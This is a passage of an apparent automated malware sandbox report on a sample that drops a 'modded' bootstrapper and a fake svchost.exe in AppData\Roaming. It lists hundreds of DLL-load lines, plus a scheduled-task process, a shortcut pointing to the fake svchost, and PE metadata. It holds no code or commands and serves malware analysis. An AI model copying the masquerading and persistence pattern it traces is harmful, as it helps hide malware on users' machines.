                          Source: C:\Users\user\AppData\Roaming\BootstrapperV1.23_ModdedByHisako.exeSection loaded: windows.storage.dllJump to behavior
                          Source: C:\Users\user\AppData\Roaming\BootstrapperV1.23_ModdedByHisako.exeSection loaded: wldp.dllJump to behavior
                          Source: C:\Users\user\AppData\Roaming\BootstrapperV1.23_ModdedByHisako.exeSection loaded: profapi.dllJump to behavior
                          Source: C:\Users\user\AppData\Roaming\BootstrapperV1.23_ModdedByHisako.exeSection loaded: cryptsp.dllJump to behavior
                          Source: C:\Users\user\AppData\Roaming\BootstrapperV1.23_ModdedByHisako.exeSection loaded: rsaenh.dllJump to behavior
                          Source: C:\Users\user\AppData\Roaming\BootstrapperV1.23_ModdedByHisako.exeSection loaded: cryptbase.dllJump to behavior
                          Source: C:\Users\user\AppData\Roaming\BootstrapperV1.23_ModdedByHisako.exeSection loaded: rasapi32.dllJump to behavior
                          Source: C:\Users\user\AppData\Roaming\BootstrapperV1.23_ModdedByHisako.exeSection loaded: rasman.dllJump to behavior
                          Source: C:\Users\user\AppData\Roaming\BootstrapperV1.23_ModdedByHisako.exeSection loaded: rtutils.dllJump to behavior
                          Source: C:\Users\user\AppData\Roaming\BootstrapperV1.23_ModdedByHisako.exeSection loaded: mswsock.dllJump to behavior
                          Source: C:\Users\user\AppData\Roaming\BootstrapperV1.23_ModdedByHisako.exeSection loaded: winhttp.dllJump to behavior
                          Source: C:\Users\user\AppData\Roaming\BootstrapperV1.23_ModdedByHisako.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                          Source: C:\Users\user\AppData\Roaming\BootstrapperV1.23_ModdedByHisako.exeSection loaded: rasadhlp.dllJump to behavior
                          Source: C:\Users\user\AppData\Roaming\BootstrapperV1.23_ModdedByHisako.exeSection loaded: fwpuclnt.dllJump to behavior
                          Source: C:\Users\user\AppData\Roaming\BootstrapperV1.23_ModdedByHisako.exeSection loaded: secur32.dllJump to behavior
                          Source: C:\Users\user\AppData\Roaming\BootstrapperV1.23_ModdedByHisako.exeSection loaded: sspicli.dllJump to behavior
                          Source: C:\Users\user\AppData\Roaming\BootstrapperV1.23_ModdedByHisako.exeSection loaded: schannel.dllJump to behavior
                          Source: C:\Users\user\AppData\Roaming\BootstrapperV1.23_ModdedByHisako.exeSection loaded: mskeyprotect.dllJump to behavior
                          Source: C:\Users\user\AppData\Roaming\BootstrapperV1.23_ModdedByHisako.exeSection loaded: ntasn1.dllJump to behavior
                          Source: C:\Users\user\AppData\Roaming\BootstrapperV1.23_ModdedByHisako.exeSection loaded: ncrypt.dllJump to behavior
                          Source: C:\Users\user\AppData\Roaming\BootstrapperV1.23_ModdedByHisako.exeSection loaded: ncryptsslp.dllJump to behavior
                          Source: C:\Users\user\AppData\Roaming\BootstrapperV1.23_ModdedByHisako.exeSection loaded: msasn1.dllJump to behavior
                          Source: C:\Users\user\AppData\Roaming\BootstrapperV1.23_ModdedByHisako.exeSection loaded: gpapi.dllJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: wersvc.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: windowsperformancerecordercontrol.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: weretw.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: xmllite.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: wldp.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: wer.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: faultrep.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: dbghelp.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: dbgcore.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: wer.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: userenv.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: profapi.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: sspicli.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: kernel.appcore.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: wlidsvc.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: ncrypt.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: cryptsp.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: profapi.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: clipc.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: dpapi.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: ntasn1.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: wldp.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: rsaenh.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: cryptbase.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: windows.storage.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: msxml6.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: msasn1.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: winhttp.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: netprofm.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: iphlpapi.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: wtsapi32.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: winsta.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: gamestreamingext.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: msauserext.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: tbs.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: npmproxy.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: ondemandconnroutehelper.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: sspicli.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: dhcpcsvc6.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: dhcpcsvc.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: webio.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: mswsock.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: winnsi.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: dnsapi.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: rasadhlp.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: fwpuclnt.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: schannel.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: mskeyprotect.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: gpapi.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: cryptnet.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: ncryptsslp.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: elscore.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: elstrans.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: cryptngc.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: devobj.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dll
                          Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dll
                          Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dll
                          Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dll
                          Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dll
                          Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: mscoree.dll
                          Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: apphelp.dll
                          Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: kernel.appcore.dll
                          Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: version.dll
                          Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: vcruntime140_clr0400.dll
                          Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: ucrtbase_clr0400.dll
                          Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: ucrtbase_clr0400.dll
                          Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: uxtheme.dll
                          Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: sspicli.dll
                          Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: cryptsp.dll
                          Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: rsaenh.dll
                          Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: cryptbase.dll
                          Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: mscoree.dll
                          Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: kernel.appcore.dll
                          Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: version.dll
                          Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: vcruntime140_clr0400.dll
                          Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: ucrtbase_clr0400.dll
                          Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: ucrtbase_clr0400.dll
                          Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: uxtheme.dll
                          Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: sspicli.dll
                          Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: cryptsp.dll
                          Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: rsaenh.dll
                          Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: cryptbase.dll
                          Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: mscoree.dll
                          Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: kernel.appcore.dll
                          Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: version.dll
                          Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: vcruntime140_clr0400.dll
                          Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: ucrtbase_clr0400.dll
                          Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: ucrtbase_clr0400.dll
                          Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: uxtheme.dll
                          Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: sspicli.dll
                          Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: cryptsp.dll
                          Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: rsaenh.dll
                          Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: cryptbase.dll
                          Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: mscoree.dll
                          Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: kernel.appcore.dll
                          Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: version.dll
                          Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: vcruntime140_clr0400.dll
                          Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: ucrtbase_clr0400.dll
                          Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: ucrtbase_clr0400.dll
                          Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: uxtheme.dll
                          Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: sspicli.dll
                          Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: cryptsp.dll
                          Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: rsaenh.dll
                          Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: cryptbase.dll
                          Source: C:\Users\user\Desktop\sDKRz09zM7.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32Jump to behavior
                          Source: svchost.lnk.2.drLNK file: ..\..\..\..\..\svchost.exe
                          Source: Window RecorderWindow detected: More than 3 window changes detected
                          Source: C:\Users\user\Desktop\sDKRz09zM7.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
                          Source: sDKRz09zM7.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                          Source: sDKRz09zM7.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                          Source: Binary string: System.Runtime.Serialization.ni.pdb source: WER61AC.tmp.dmp.12.dr
                          Source: Binary string: System.Data.pdb source: WER61AC.tmp.dmp.12.dr
                          Source: Binary string: System.Xml.ni.pdb source: WER61AC.tmp.dmp.12.dr
